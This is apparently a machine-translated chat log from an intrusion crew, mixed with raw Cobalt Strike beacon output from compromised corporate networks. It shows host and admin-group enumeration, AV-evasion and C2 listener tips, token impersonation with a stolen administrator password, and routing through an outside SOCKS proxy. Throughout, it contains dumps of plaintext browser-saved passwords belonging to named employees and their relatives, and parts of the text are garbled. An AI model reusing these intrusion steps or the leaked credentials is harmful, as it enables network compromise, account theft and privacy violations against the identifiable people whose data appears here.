toputput in the sphere? for the future all - always check the test method node and ip and on the hostname` `` vc1.rtpco.local:5580 `` vc1.rtpco.local:5480 `` vc1.rtpco.local:636 vc1.rtpco.local:514 vc1.rtpco.local:443 vc1.rtpco.local:389 vc1.rtpco.local:88 vc1.rtpco.local:80 vc1.rtpco.local:22 (SSH-2.0-OpenSSH_7.4) The first thing is to resolve the name of the proxy and then come in proxy can not do it in dnspo ip come in...omgscan ports webane opens (when you come in what does it say? 
```
Teemo[MNDC2]SYSTEM */7388|2020Dec24 03:09:47> shell ping vc1.rtpco.local -n 1
[*] Tasked beacon to run: ping vc1.rtpco.local -n 1
[+] host called home, sent: 56 bytes
[+] received output:
Pinging vc1.rtpco.local [172.22.254.20] with 32 bytes of data:
Reply from 172.22.254.20: bytes=32 time<1ms TTL=63
Ping statistics for 172.22.254.20:
 Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
 Minimum = 0ms, Maximum = 0ms, Average = 0ms
```

this?
vc1.rtpco.local is dead

```
Teemo[WINDC2]SYSTEM */4284|2020Dec24 03:08:13> shell ping VMWAREMGR -n 1
[*] Tasked beacon to run: ping VMWAREMGR -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Pinging VMWAREMGR.winona.rtpco.local [89.0.55.9] with 32 bytes of data:
Reply from 89.0.0.92: Destination host unreachable.
Ping statistics for 89.0.55.9:
 Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```

The "hosts" exist? According to the links, yes, but I can't get there + is there virtualization at all?
the question is this
eyJhbGciOiJBFQgtWxVdSoioqX5YErUhcIWJjoVCS8e2VVd3ipHBBbQqnpYJgmIoDjGx8mG9sjMkJv8dbB8pRYcMRFtlgGuabvp7IcFoBSDikbUE6OFR7QbhdjYmKmzQ3Pi+YSzQiJWgXfzrTxiDXvVVD9yLs5HZAMx7kd+H96FWXSHBF4roPEKIu1NsQlI/ikikb5ZXZtb8Bjzu/UJsDFij6CuIv1lAkQ==
eyJhbGciOiJBY7xUYEIzqDilLSDdB+KfdMuSF53iWnoIJ/eW2At2J6J6dogVGoAelC0ZeKKc1Ta08ZNVGzSxKtg71IW73duj0lO22fXmrXZ2qSduLXhB2QoSzzbdZRgTfb9O03MOCPs074EWzTy1UmUpD/CdsKmiKPOwFHZmrMWuJ1jyROhhGBPlKiE2HbrUYv5MR51TMndJ5Pqvg8pWc82dCOEzxSu7zvuKqAHjtCtfUtoDRp9pPGc=
our rocket)
who's gonna get pussy for taking the initiative?))))
I'm intrigued
read the main)
tell me)
we never get bored
I'm in the course of fucking fun situation, kz)))))
and who conducted the meeting I do not know ((but did not let me see anything)
Target said that the set and some tests are not in the course
I have not even seen them
tut? you didn't happen to check the tests for new candidates?
ok then i'll send them in a separate pack i'm ahtung here again but in a couple of hours i'll be taking my test soon so can you give me yours for pars?+ do not have to duplicate and you can always consult plus I write all sorts of things they fly different information interesting to work in the general channels remind me to give you tomorrow to rocket to online norton and bypass the detector I just did a test so I have no way to parry it i don't think i'm thinking too much now) it's funny how life is so fucked up when no one is thinking about anything it was like this to this day when i used to communicate with the minister i took it from someone else's cobalt long time ago so right i started noticing crooked listener in other people's cobalts it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager) if you write ipak from HTtps Host (Stager) - stepping goes "bypassing" SSL certificate which is on the pad - which is FUCKING and adds blocking by phasers all I see give me the session pass takehq.com No hedgehog beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History" [*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History" [+] host called home, sent: 108 bytes [+] received output: The system cannot find the path specified. beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\" [*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\" [+] host called home, sent: 101 bytes [+] received output: The system cannot find the path specified. beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\" [*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\" [+] host called home, sent: 93 bytes [+] received output: The system cannot find the file specified. 
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\" [*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\" [+] host called home, sent: 83 bytes [+] received output: Volume in drive C has no label. Volume Serial Number is D0FC-5A15 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge 08/05/2019 07:05 AM . 08/05/2019 07:05 AM . 0 File(s) 0 bytes 2 Dir(s) 24,238,346,240 bytes free ``at least give us a sign of life'' (no session) ``c:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History```` Directory of C:\Users\Djarden\AppData\Local\MicrosoftEdge\User\Default 01/26/2017 10:24 AM . 01/26/2017 10:24 AM . 0 File(s) 0 bytes 2 Dir(s) 24,248,209,408 bytes free ``` ``` Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge 08/05/2019 07:05 AM . 08/05/2019 07:05 AM . 0 File(s) 0 bytes 2 Dir(s) 24,254,611,456 bytes free ``` ``` Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge 02/03/2017 08:42 AM . 02/03/2017 08:42 AM . 01/26/2017 09:48 AM CortanaAssist 02/03/2017 08:42 AM Extensions 01/26/2017 09:46 AM PlayReady 01/30/2019 01:13 PM UrlBlock 01/26/2017 09:46 AM User 0 File(s) 0 bytes 7 Dir(s) 24,243,003,392 bytes free ``` ``` Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default 04/26/2017 09:01 AM . 04/26/2017 09:01 AM . 
04/26/2017 09:01 AM BrowserImport 01/15/2021 01:13 PM DataStore 01/22/2018 10:23 AM DomainSuggestions 01/26/2017 09:46 AM Favorites 01/26/2017 09:46 AM ImageStore 09/10/2020 03:38 PM RACShare 08/28/2017 01:01 PM Recovery 0 File(s) 0 bytes 9 Dir(s) 24,242,847,744 bytes free ``` ``` Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History File Not Found ``Ah, yes, I switched servers ``` setg Proxies socks4:185.150.189.165:43940 `takehq.com give me a passport session i asked to leave for the maila why did you put out the socks?) not a folder there history file should lie hezh? 1 megabyte fftam and chrome `asdvtgr5erqwdf` and go to the ortn try it yourself pick me pliz history file i can not believe that not dumpedda it does not have a fox?I don't know if it's a good idea to get it from her, but I'm not sure if it's a good idea to get it from her, I just don't know if it's a good idea to get it from her. ``` DA Members ------------------------------------------------------------------------------- Administrator arobinsona cancelet kaseyaservice O365Service sagert The command completed successfully. ``` ``` Members ------------------------------------------------------------------------------- Administrator Domain Admins Enterprise Admins RTP-Admins_Ent vmbackup The command completed successfully. 
``Error when opening the archive-rezip Symantec Endpoint Protection Kaspersky Endpoint Security 10 for Windows And some https://www.kaseya.com ``` DA Members ------------------------------------------------------------------------------- Administrator adonixadmin alloyamms Angel barracuda BarracudaBUP bbuerck BGW CAncelet canceleta cevansa citrix_svc DHaase EntAdmin gahbarracuda orgbarracuda sagert Services_Backup Uptime veeam wstangea ``` ``` EA Members ------------------------------------------------------------------------------- Administrator EntAdmin Services_Backup Uptime wstangea The command completed successfully. ``` ``` LA richmonddc1 Members ------------------------------------------------------------------------------- Administrator adonixadmin Domain Admins EntAdmin Enterprise Admins sagert Services_Backup smonitor Uptime The command completed successfully. `````` [*] Beginning Edge Extraction. --- Chromium Credential (User: mharper) --- URL : https://id.atlassian.com/signup/invite Username : mharper@waterway.com Password : LoveUnit14# [*] Finished Edge extraction. What's in the hedgehog, if sharpweb is dead, I check the files in gkeller\g$ so what's in the hedgehog? http://192.168.0.80/ http://192.168.0.11/ http://192.168.0.43/ http://192.168.0.57/ http://192.168.0.47/ http://192.168.0.121:8080/ ``Check out chrome, the hedgehog and the hedgehog didn't check out``` so I downloaded the profile of the ff and the browsers from it? File Not Found ``File Guess What``` Volume in drive C is Windows Volume Serial Number is A6E5-1986 ``Do then ``dir C:\users\*.rdg /s`` is not there this password has a session? I also asked to see the rdp there from-guesspolzak and taka and what about the takapolzak from what taka? or sharpChrome?it's from where? i see it's just there, i can't see the password if it's not waterway99! let me try there's a saved password i'll tell you more last time bingo was in the history ffugaday where did bingo know? 
49655 https://infosight.hpe.com/app/login HPE InfoSight | Hewlett Packard Enterprise 1 0 13250782013357001watch the admins on the rdp interestingI by the way the web port does not work there 127.0.1.1:3389 127.0.1.1:445 maybe it's true....keep all mail accesses nearby to clean up the alerts if we find nimble accesses by the way i figured it was a redirect to 127.0.0.1 noticed this message long time ago when i was going through the mail using the word nimble so i fucked up my time :` ` beacon> shell ping -a 127.0.1.1 [*] Tasked beacon to run: ping -a 127.0.1.1. [+] host called home, sent: 48 bytes [+] received output: Pinging 127.0.1.1 with 32 bytes of data: Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.1.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms beacon> shell nslookup 127.0.1.1 [*] Tasked beacon to run: nslookup 127.0.1.1 [+] host called home, sent: 49 bytes [+] received output: *** wwdc2.waterway.com can't find 127.0.1.1: Non-existent domain Server: wwdc2.waterway.com Address: 192.168.0.222 and the other 50% is another way is 50%[ ](https://mediaeveryone.com/group/waterway-com?msg=HjARdNfzFS88zuRew) take into account the fact that they mb tupo badly configured it can immediately nslookup[ ](https://mediaeveryone.com/group/waterway-com?msg=8APBAwuecQy7S2Etk) no, it's a chip. last logon write during login) pinging from the network 127.0.1.1 is a service crap for spam mail tact "with itself" is not 127.0.0.so for ssh would be third-party iptipo they go there(?) well ssh isa127.0.1.1.1 there is writing root login from if you mean what I wrote abovein meaning? just smssochki strange-nimbeltam eto gde tam rd port open? 
tell me on the request for password while i see that they complain "i forgot my password from my kankuntemr((( "and here rakspeyspro nimbly here are samesochki come on the desktop nothing interesting? ``` netstat /p tcp /a | findstr 3389 ``anything on the desktop? Look where the rdp opens in the ff, nothing interesting URL : https://mail.datotel.com/ Username : hd@waterway.com Password : Waterway1 ``` did you check this e-mail? that's how we haven't found it yet they seem to have a vendor database with this kind of access --- Chromium Credential (User: mapusatera) --- URL : http://wwsql01/ Username : sa Password : sa `````` --- Chromium Credential (User: mapusatera) --- URL : https://auth.monday.com/users/invitation/accept Username : 3146293823 Password : BlML#D6oJ155 --- Chromium Credential (User: mapusatera) --- URL : https://waterwaycarwash.monday.com/users/sign_in Username : 3146293823 Password : BlML#D6oJ155 --- Chromium Credential (User: mapusatera) --- URL : https://www.cnn.com/account/register Username : 63367 Password : Wf$.tP-sF2Z4pF* --- Chromium Credential (User: mapusatera) --- URL : https://aim.luminatehealth.com/login Username : michaelpusatera@gmail.com Password : kUVkch.4M.YBR9X --- Chromium Credential (User: mapusatera) --- URL : Username : michaelpusatera@gmail.com Password : 715Drew --- Chromium Credential (User: mapusatera) --- URL : https://www.hollisterco.com/shop/OrderItemDisplayView Username : Password : N-nC2c*bTB_C-v- --- Chromium Credential (User: mapusatera) --- URL : https://shop.lululemon.com/shop/checkout/confirmation Username : amybrinkman13@gmail.com Password : fws5z&mQtf5WUVH --- Chromium Credential (User: mapusatera) --- URL : https://www.ae.com/us/en/cart Username : morganpusatera@icloud.com Password : ILOVEDANCE123\ [*] Finished Google Chrome extraction. [*] Beginning Edge Extraction. 
--- Chromium Credential (User: mapusatera) --- URL : https://system.netsuite.com/ Username : mpusatera@sotelsystems.com Password : --- Chromium Credential (User: mapusatera) --- URL : https://login5.silverpop.com/ Username : transact@waterway.com Password : $tqMy2K5%T#r --- Chromium Credential (User: mapusatera) --- URL : http://wwsql01/ Username : sa Password : sa --- Chromium Credential (User: mapusatera) --- URL : https://login.live.com/ Username : map@waterway.com Password : --- Chromium Credential (User: mapusatera) --- URL : http://reportserver.waterway.com/ Username : sa Password : --- Chromium Credential (User: mapusatera) --- URL : https://login5.silverpop.com/ Username : map@waterway.com Password : %0%f#rC!5vJj --- Chromium Credential (User: mapusatera) --- URL : https://mail.datotel.com/ Username : hd@waterway.com Password : Waterway1 --- Chromium Credential (User: mapusatera) --- URL : http://reportserver.waterway.com/ Username : waterway\administrator Password : --- Chromium Credential (User: mapusatera) --- URL : https://signin.quicken.com/ Username : michaelpusatera@gmail.com Password : --- Chromium Credential (User: mapusatera) --- URL : https://www.waterway.com/ Username : michaelpusatera@gmail.com Password : fgSrBr%2#cJx --- Chromium Credential (User: mapusatera) --- URL : https://login.live.com/ Username : michaelpusatera@gmail.com Password : Richie42 I'll take a look, while you take off the chrome and explore the car, I see he has a FF thank you make_token WATERWAY\Administrator 1853Gators ``Give me an admin account for the token Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 8 K NT AUTHORITY\SYSTEM 29:59:15 System 4 Services 0 1,240 K N/A 0:05:27 Secure System 72 Services 0 40,344 K NT AUTHORITY\SYSTEM 0:00:00 Registry 132 Services 0 103,088 K NT 
AUTHORITY\SYSTEM 0:00:07 smss.exe 520 Services 0 1,136 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 896 Services 0 4,932 K NT AUTHORITY\SYSTEM 0:00:04 wininit.exe 988 Services 0 6,092 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 996 Console 1 3,936 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 816 Services 0 14,728 K NT AUTHORITY\SYSTEM 0:06:11 LsaIso.exe 644 Services 0 2,844 K NT AUTHORITY\SYSTEM 0:00:00 lsass.exe 788 Services 0 28,512 K NT AUTHORITY\SYSTEM 0:00:30 svchost.exe 1136 Services 0 28,364 K NT AUTHORITY\SYSTEM 0:00:05 WUDFHost.exe 1164 Services 0 7,648 K NT AUTHORITY\LOCAL SERVICE 0:00:00 fontdrvhost.exe 1200 Services 0 3,300 K Font Driver Host\UMFD-0 0:00:00 winlogon.exe 1288 Console 1 8,348 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 1348 Services 0 17,564 K NT AUTHORITY\NETWORK SERVICE 0:00:20 svchost.exe 1400 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:04 fontdrvhost.exe 1424 Console 1 2,720 K Font Driver Host\UMFD-1 0:00:00 LogonUI.exe 1508 Console 1 51,348 K NT AUTHORITY\SYSTEM 0:00:03 svchost.exe 1612 Services 0 177,256 K NT AUTHORITY\NETWORK SERVICE 0:03:30 svchost.exe 1660 Services 0 7,028 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 1668 Services 0 7,484 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 1676 Services 0 4,864 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 1684 Services 0 10,660 K NT AUTHORITY\LOCAL SERVICE 0:00:00 dwm.exe 1696 Console 1 33,872 K Window Manager\DWM-1 0:00:00 svchost.exe 1704 Services 0 6,136 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 1712 Services 0 10,664 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 1732 Services 0 5,060 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 1920 Services 0 8,768 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 1928 Services 0 6,904 K NT AUTHORITY\LOCAL SERVICE 0:00:01 svchost.exe 1936 Services 0 11,164 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 876 Services 0 9,372 K NT AUTHORITY/NETWORK SERVICE 0:00:06 svchost.exe 1480 Services 0 15,148 K NT AUTHORITY\SYSTEM 0:00:01 svchost.exe 2096 
Services 0 5,948 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2132 Services 0 6,864 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2168 Services 0 17,260 K NT AUTHORITY\LOCAL SERVICE 0:00:36 svchost.exe 2196 Services 0 8,172 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 2208 Services 0 13,320 K NT AUTHORITY\SYSTEM 0:00:01 svchost.exe 2256 Services 0 18,528 K NT AUTHORITY\LOCAL SERVICE 0:00:05 svchost.exe 2444 Services 0 9,292 K NT AUTHORITY\SYSTEM 0:00:01 svchost.exe 2524 Services 0 10,280 K NT AUTHORITY/NETWORK SERVICE 0:00:03 svchost.exe 2580 Services 0 5,760 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 2716 Services 0 7,184 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2728 Services 0 16,268 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2776 Services 0 8,380 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 2824 Services 0 24,512 K NT AUTHORITY\SYSTEM 0:02:36 svchost.exe 2892 Services 0 9,584 K NT AUTHORITY\SYSTEM 0:00:00 vmms.exe 3060 Services 0 22,292 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3128 Services 0 6,976 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3156 Services 0 7,048 K NT AUTHORITY\LOCAL SERVICE 0:00:01 svchost.exe 3168 Services 0 6,508 K NT AUTHORITY\LOCAL SERVICE 0:00:00 NVDisplay.Container.exe 3276 Services 0 16,440 K NT AUTHORITY\SYSTEM 0:00:01 svchost.exe 3284 Services 0 10,532 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3296 Services 0 10,420 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3384 Services 0 8,780 K NT AUTHORITY\NETWORK SERVICE 0:00:00 svchost.exe 3480 Services 0 8,792 K NT AUTHORITY\SYSTEM 0:00:33 svchost.exe 3488 Services 0 5,508 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3496 Services 0 7,696 K NT AUTHORITY\LOCAL SERVICE 0:00:01 svchost.exe 3664 Services 0 6,560 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3672 Services 0 9,656 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 3768 Services 0 9,088 K NT AUTHORITY\SYSTEM 0:00:00 Memory Compression 3776 Services 0 420,412 K NT AUTHORITY\SYSTEM 0:00:24 svchost.exe 3876 Services 0 7,652 K NT AUTHORITY\SYSTEM 
0:00:00 svchost.exe 3888 Services 0 7,524 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 3996 Services 0 8,412 K NT AUTHORITY\SYSTEM 0:00:00 dasHost.exe 4300 Services 0 10,316 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 4364 Services 0 7,416 K NT AUTHORITY\LOCAL SERVICE 0:00:00 vmcompute.exe 4500 Services 0 6,648 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 4520 Services 0 13,532 K NT AUTHORITY\LOCAL SERVICE 0:00:03 svchost.exe 4592 Services 0 5,808 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 4600 Services 0 8,532 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 4640 Services 0 6,684 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 4768 Services 0 12,944 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 4812 Services 0 15,420 K NT AUTHORITY\SYSTEM 0:00:09 spoolsv.exe 4864 Services 0 28,180 K NT AUTHORITY\SYSTEM 0:00:01 armsvc.exe 4956 Services 0 5,900 K NT AUTHORITY\SYSTEM 0:00:00 winagent.exe 4972 Services 0 23,628 K NT AUTHORITY\SYSTEM 0:00:16 BASupSrvc.exe 5012 Services 0 22,820 K NT AUTHORITY\SYSTEM 0:00:05 AdobeUpdateService.exe 5032 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00 BASupSrvcUpdater.exe 5048 Services 0 15,524 K NT AUTHORITY\SYSTEM 0:00:02 AGMService.exe 5076 Services 0 10,448 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 5100 Services 0 8,764 K NT AUTHORITY\SYSTEM 0:00:00 BtwRSupportService.exe 5116 Services 0 6,920 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2308 Services 0 12,940 K NT AUTHORITY\NETWORK SERVICE 0:00:00 CarboniteService.exe 4556 Services 0 130,688 K NT AUTHORITY\SYSTEM 1:30:52 BtSwitcherService.exe 4808 Services 0 6,400 K NT AUTHORITY\SYSTEM 0:00:00 CsrBtService.exe 5128 Services 0 8,532 K NT AUTHORITY\SYSTEM 0:00:00 CsrBtOBEXService.exe 5136 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00 AGSService.exe 5144 Services 0 10,000 K NT AUTHORITY\SYSTEM 0:00:00 officeclicktorun.exe 5168 Services 0 29,316 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 5244 Services 0 34,896 K NT AUTHORITY\SYSTEM 0:00:12 svchost.exe 5252 Services 0 40,360 K NT 
AUTHORITY\LOCAL SERVICE 0:00:11 EPIntegrationService.exe 5264 Services 0 16,884 K NT AUTHORITY\SYSTEM 0:00:02 EPUpdateService.exe 5344 Services 0 9,172 K NT AUTHORITY\SYSTEM 0:00:02 EPSecurityService.exe 5352 Services 0 405,312 K NT AUTHORITY\SYSTEM 0:04:30 EPProtectedService.exe 5388 Services 0 8,252 K NT AUTHORITY\SYSTEM 0:00:00 bdredline.exe 5404 Services 0 12,116 K NT AUTHORITY\SYSTEM 0:00:00 fbguard.exe 5488 Services 0 6,244 K NT AUTHORITY\SYSTEM 0:00:00 MSOIDSVC.EXE 5636 Services 0 15,232 K NT AUTHORITY\SYSTEM 0:00:00 jhi_service.exe 5720 Services 0 5,964 K NT AUTHORITY\SYSTEM 0:00:00 KiteService.exe 5728 Services 0 29,228 K NT AUTHORITY\SYSTEM 0:00:00 IpOverUsbSvc.exe 5748 Services 0 12,316 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 5760 Services 0 8,816 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 5772 Services 0 12,832 K NT AUTHORITY\LOCAL SERVICE 0:00:01 svchost.exe 5780 Services 0 5,412 K NT AUTHORITY\SYSTEM 0:00:00 erlsrv.exe 5792 Services 0 3,472 K NT AUTHORITY\SYSTEM 0:00:00 sqlwriter.exe 5800 Services 0 7,788 K NT AUTHORITY\SYSTEM 0:00:00 CsrBtAudioService.exe 5808 Services 0 7,924 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 5828 Services 0 10,188 K NT AUTHORITY\SYSTEM 0:00:00 RedGate.Client.Service.ex 5820 Services 0 56,536 K NT AUTHORITY\SYSTEM 0:00:06 cygrunsrv.exe 5844 Services 0 5,784 K NT AUTHORITY\SYSTEM 0:00:00 cygrunsrv.exe 5856 Services 0 5,800 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 5888 Services 0 18,580 K NT AUTHORITY\SYSTEM 0:00:00 agent.exe 5912 Services 0 148,340 K NT AUTHORITY\SYSTEM 0:01:22 svchost.exe 5928 Services 0 5,912 K NT AUTHORITY\LOCAL SERVICE 0:00:00 cygrunsrv.exe 5936 Services 0 5,752 K NT AUTHORITY\SYSTEM 0:00:00 nvcontainer.exe 5952 Services 0 31,552 K NT AUTHORITY\SYSTEM 0:00:01 svchost.exe 6040 Services 0 5,600 K NT AUTHORITY\LOCAL SERVICE 0:00:00 erl.exe 6112 Services 0 23,400 K NT AUTHORITY\SYSTEM 0:03:59 fbserver.exe 6232 Services 0 6,712 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 6248 Services 0 5,312 K NT 
AUTHORITY\SYSTEM 0:00:01 svchost.exe 6404 Services 0 7,052 K NT AUTHORITY/NETWORK SERVICE 0:00:00 MSOIDSVCM.EXE 6772 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 6880 Services 0 6,880 K NT AUTHORITY\LOCAL SERVICE 0:00:01 cygrunsrv.exe 6968 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00 cygrunsrv.exe 7100 Services 0 7,120 K NT AUTHORITY\SYSTEM 0:00:00 epmd.exe 7284 Services 0 3,492 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 7316 Services 0 12,360 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 7408 Services 0 6,956 K NT AUTHORITY\NETWORK SERVICE 0:00:00 sqlservr.exe 7656 Services 0 243,216 K NT SERVICE\MSSQLSERVER 0:09:42 unsecapp.exe 7716 Services 0 6,536 K NT AUTHORITY\SYSTEM 0:00:00 sqlceip.exe 7820 Services 0 41,456 K NT SERVICE\SQLTELEMETRY 0:00:02 conhost.exe 8448 Services 0 7,544 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 8516 Services 0 7,384 K NT AUTHORITY\SYSTEM 0:00:00 alprlink.exe 8636 Services 0 17,492 K NT AUTHORITY\SYSTEM 0:00:00 alprd.exe 8704 Services 0 196,332 K NT AUTHORITY\SYSTEM 0:00:08 conhost.exe 8816 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00 beanstalkd.exe 8912 Services 0 5,364 K NT AUTHORITY\SYSTEM 0:00:01 rundll32.exe 8924 Console 1 6,580 K NT AUTHORITY\SYSTEM 0:00:00 NVDisplay.Container.exe 8292 Console 1 37,580 K NT AUTHORITY\SYSTEM 0:00:04 WmiPrvSE.exe 8264 Services 0 54,308 K NT AUTHORITY\SYSTEM 0:00:18 svchost.exe 9464 Services 0 8,284 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 10772 Services 0 15,412 K NT AUTHORITY/NETWORK SERVICE 0:00:05 svchost.exe 10896 Services 0 10,804 K NT AUTHORITY\SYSTEM 0:00:03 NableSixtyFourBitManager. 
11368 Services 0 23,952 K NT AUTHORITY\SYSTEM 0:00:41 conhost.exe 11376 Services 0 4,756 K NT AUTHORITY\SYSTEM 0:00:00 NableReactiveManagement.e 11408 Services 0 32,052 K NT AUTHORITY\SYSTEM 0:00:01 conhost.exe 11420 Services 0 4,760 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 11636 Services 0 13,736 K NT AUTHORITY\SYSTEM 0:00:00 fdlauncher.exe 11784 Services 0 4,376 K NT SERVICE\MSSQLFDLauncher 0:00:00 Launchpad.exe 11792 Services 0 16,268 K NT SERVICE\MSSQLLaunchpad 0:00:00 fdhost.exe 11868 Services 0 6,328 K NT SERVICE\MSSQLFDLauncher 0:00:00 conhost.exe 11876 Services 0 4,672 K NT SERVICE\MSSQLFDLauncher 0:00:00 win32sysinfo.exe 12240 Services 0 2,348 K NT AUTHORITY\SYSTEM 0:00:00 inet_gethethost.exe 5332 Services 0 4,584 K NT AUTHORITY\SYSTEM 0:00:00 SolarWinds.MSP.CacheServi 13132 Services 0 37,972 K NT AUTHORITY\LOCAL SERVICE 0:00:03 SolarWinds.MSP.RpcServerS 13244 Services 0 48,160 K NT AUTHORITY\SYSTEM 0:00:06 dllhost.exe 12684 Services 0 10,632 K NT AUTHORITY\SYSTEM 0:00:00 fmplugin.exe 9848 Services 0 28,400 K NT AUTHORITY\SYSTEM 0:00:13 conhost.exe 9832 Services 0 7,776 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 1304 RDP-Tcp#2 2 6,464 K NT AUTHORITY\SYSTEM 0:00:16 winlogon.exe 1532 RDP-Tcp#2 2 2 9,268 K NT AUTHORITY\SYSTEM 0:00:00 WUDFHost.exe 2220 Services 0 68,012 K NT AUTHORITY\LOCAL SERVICE 0:03:59 fontdrvhost.exe 2744 RDP-Tcp#2 2 8,708 K Font Driver Host\UMFD-2 0:00:01 dwm.exe 4320 RDP-Tcp#2 2 87,008 K Window Manager\DWM-2 0:01:17 NVDisplay.Container.exe 5576 RDP-Tcp#2 2 2 50,612 K NT AUTHORITY\SYSTEM 0:00:02 svchost.exe 6276 Services 0 7,112 K NT AUTHORITY\SYSTEM 0:00:00 EPConsole.exe 11732 RDP-Tcp#2 2 1,220 K WATERWAY\mapusatera 0:00:03 rdpclip.exe 3540 RDP-Tcp#2 2 11,648 K WATERWAY\mapusatera 0:00:11 nvcontainer.exe 11124 RDP-Tcp#2 2 23,532 K WATERWAY\mapusatera 0:00:02 sihost.exe 4508 RDP-Tcp#2 2 26,852 K WATERWAY\mapusatera 0:00:04 nvcontainer.exe 3140 RDP-Tcp#2 2 38,620 K WATERWAY\mapusatera 0:00:55 svchost.exe 11080 RDP-Tcp#2 2 26,112 K 
